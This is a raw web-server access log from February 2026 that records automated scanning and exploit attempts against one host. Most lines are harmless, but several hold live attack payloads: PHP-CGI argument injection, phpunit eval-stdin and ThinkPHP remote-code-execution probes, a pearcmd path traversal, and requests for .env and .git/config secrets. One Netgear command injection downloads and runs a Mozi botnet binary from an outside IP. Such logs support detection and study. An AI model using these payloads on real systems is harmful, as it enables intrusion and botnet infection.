+[18/Feb/2026:05:03:53 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:05:16:34 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" +[18/Feb/2026:05:17:51 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:05:19:10 +0000] 400 - - http localhost "-" [Client 176.65.148.19] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:05:31:09 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:05:36:24 +0000] 404 - GET http 222.117.41.51 "/login" [Client 193.142.146.230] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[18/Feb/2026:05:48:35 +0000] 200 - GET http 222.117.41.51 "/" [Client 206.168.34.44] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[18/Feb/2026:05:48:37 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.44] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:05:48:38 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Feb/2026:05:48:38 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.44] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:05:49:02 +0000] 404 - GET http 222.117.41.51 "/login" [Client 206.168.34.44] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[18/Feb/2026:05:49:02 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.44] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:05:54:41 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 159.65.119.52] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:05:54:42 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 159.65.119.52] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:05:54:43 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:43 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 159.65.119.52] [Length 154] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:43 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:43 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:44 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:44 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:44 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:45 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:45 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:45 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:46 +0000] 404 - GET http 222.117.41.51 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:46 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:46 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:47 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:47 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:47 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:48 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:48 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:48 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:48 +0000] 404 - GET http 222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:49 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:49 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:49 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:50 +0000] 404 - GET http 222.117.41.51 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:50 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:50 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:50 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:51 +0000] 404 - GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:51 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:51 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:52 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:52 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:52 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:53 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:53 +0000] 404 - GET http 222.117.41.51 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:54 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:54 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:54 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:54 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:55 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:55 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:55 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:56 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:54:56 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 159.65.119.52] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:56:18 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:05:57:48 +0000] 404 - GET http 222.117.41.51 "/.git/config" [Client 172.94.9.253] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[18/Feb/2026:05:57:49 +0000] 404 - GET http 222.117.41.51 "/admin/.git/config" [Client 172.94.9.253] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[18/Feb/2026:05:57:49 +0000] 404 - GET http 222.117.41.51 "/private/.git/config" [Client 172.94.9.253] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[18/Feb/2026:06:03:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:06:08:53 +0000] 400 - - http localhost "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:06:08:55 +0000] 400 - - http localhost "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:06:08:56 +0000] 400 - - http localhost "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:06:08:57 +0000] 400 - - http localhost "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:06:08:58 +0000] 400 - GET http 222.117.41.51 "/" [Client 195.170.172.128] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[18/Feb/2026:06:08:59 +0000] 400 - POST http 222.117.41.51 "/" [Client 195.170.172.128] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[18/Feb/2026:06:09:00 +0000] 400 - POST http 222.117.41.51 "/" [Client 195.170.172.128] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[18/Feb/2026:06:09:01 +0000] 400 - GET http 222.117.41.51 "/WuEL" [Client 195.170.172.128] [Length 654] [Gzip -] "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; ; NCLIENT50_AAPCDA5841E333)" "-" +[18/Feb/2026:06:09:03 +0000] 400 - - http localhost "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:06:09:04 +0000] 400 - GET http 222.117.41.51 "/a" [Client 195.170.172.128] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[18/Feb/2026:06:09:05 +0000] 400 - GET http 222.117.41.51 "/download/file.ext" [Client 195.170.172.128] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[18/Feb/2026:06:09:06 +0000] 400 - GET http 222.117.41.51 "/SiteLoader" [Client 195.170.172.128] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[18/Feb/2026:06:09:07 +0000] 400 - GET http 222.117.41.51 "/mPlayer" [Client 195.170.172.128] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[18/Feb/2026:06:09:09 +0000] 400 - POST http 222.117.41.51 "/" [Client 195.170.172.128] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[18/Feb/2026:06:09:10 +0000] 400 - GET http 222.117.41.51 "/" [Client 195.170.172.128] [Length 632] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[18/Feb/2026:06:12:28 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:06:19:51 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:06:20:02 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" +[18/Feb/2026:06:20:03 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" +[18/Feb/2026:06:20:03 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:06:20:04 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" +[18/Feb/2026:06:20:04 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:06:20:52 +0000] 400 - GET http 222.117.41.51 "/" [Client 167.94.138.192] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[18/Feb/2026:06:20:53 +0000] 400 - - http localhost "-" [Client 167.94.138.192] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:06:20:57 +0000] 400 - GET http 222.117.41.51 "/.well-known/security.txt" [Client 167.94.138.192] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[18/Feb/2026:06:27:18 +0000] 200 - GET http 222.117.41.51 "/" [Client 74.82.47.2] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0" "-" +[18/Feb/2026:06:28:32 +0000] 404 - GET http 222.117.41.51 "/webui/" [Client 74.82.47.2] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15" "-" +[18/Feb/2026:06:33:00 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Feb/2026:06:34:34 +0000] 404 - GET http 222.117.41.51 "/geoserver/web/" [Client 74.82.47.2] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0" "-" +[18/Feb/2026:06:42:15 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.130.71.237] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[18/Feb/2026:06:43:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 109.105.210.104] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[18/Feb/2026:06:46:45 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:07:03:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.215.0.144] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:07:03:07 +0000] 404 - GET http 222.117.41.51 "/aaa9" [Client 95.215.0.144] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[18/Feb/2026:07:03:07 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.215.0.144] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:07:03:08 +0000] 404 - GET http 222.117.41.51 "/aab9" [Client 95.215.0.144] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[18/Feb/2026:07:04:22 +0000] 200 - GET http 222.117.41.51 "/" [Client 195.3.221.86] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0" "-" +[18/Feb/2026:07:11:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:07:12:15 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:07:12:39 +0000] 400 - GET http 222.117.41.51 "/version" [Client 165.154.202.146] [Length 252] [Gzip -] "-" "-" +[18/Feb/2026:07:12:39 +0000] 400 - GET http 222.117.41.51 "/" [Client 165.154.202.146] [Length 252] [Gzip -] "-" "-" +[18/Feb/2026:07:12:40 +0000] 400 - GET http 222.117.41.51 "/" [Client 165.154.202.146] [Length 252] [Gzip -] "-" "-" +[18/Feb/2026:07:12:40 +0000] 400 - GET http 222.117.41.51 "/v1" [Client 165.154.202.146] [Length 252] [Gzip -] "-" "-" +[18/Feb/2026:07:12:41 +0000] 400 - - http localhost "-" [Client 165.154.202.146] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:07:12:42 +0000] 400 - - http localhost "-" [Client 165.154.202.146] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:07:12:43 +0000] 400 - GET http 222.117.41.51 "/" [Client 165.154.202.146] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[18/Feb/2026:07:12:44 +0000] 400 - GET http 222.117.41.51 "/" [Client 45.142.154.64] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[18/Feb/2026:07:12:45 +0000] 400 - GET http 222.117.41.51 "/" [Client 45.142.154.63] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[18/Feb/2026:07:35:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:07:46:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" +[18/Feb/2026:07:58:11 +0000] 400 - GET http 222.117.41.51 "/" [Client 185.12.59.118] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0" "-" +[18/Feb/2026:08:00:48 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:08:03:00 +0000] 404 - GET http localhost-nginx-proxy-manager "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://182.60.237.31:42440/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1" [Client 182.60.237.31] [Length 150] [Gzip -] "-" "-" +[18/Feb/2026:08:04:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[18/Feb/2026:08:05:06 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:08:05:48 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 185.242.226.110] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:08:14:42 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:08:23:40 +0000] 200 - GET http 222.117.41.51 "/" [Client 60.165.238.170] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[18/Feb/2026:08:27:48 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:08:44:27 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 141.11.184.156] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:08:44:28 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 141.11.184.156] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:08:44:28 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:29 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 141.11.184.156] [Length 154] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:29 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:29 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:29 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:30 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:30 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:30 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:31 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:31 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:31 +0000] 404 - GET http 222.117.41.51 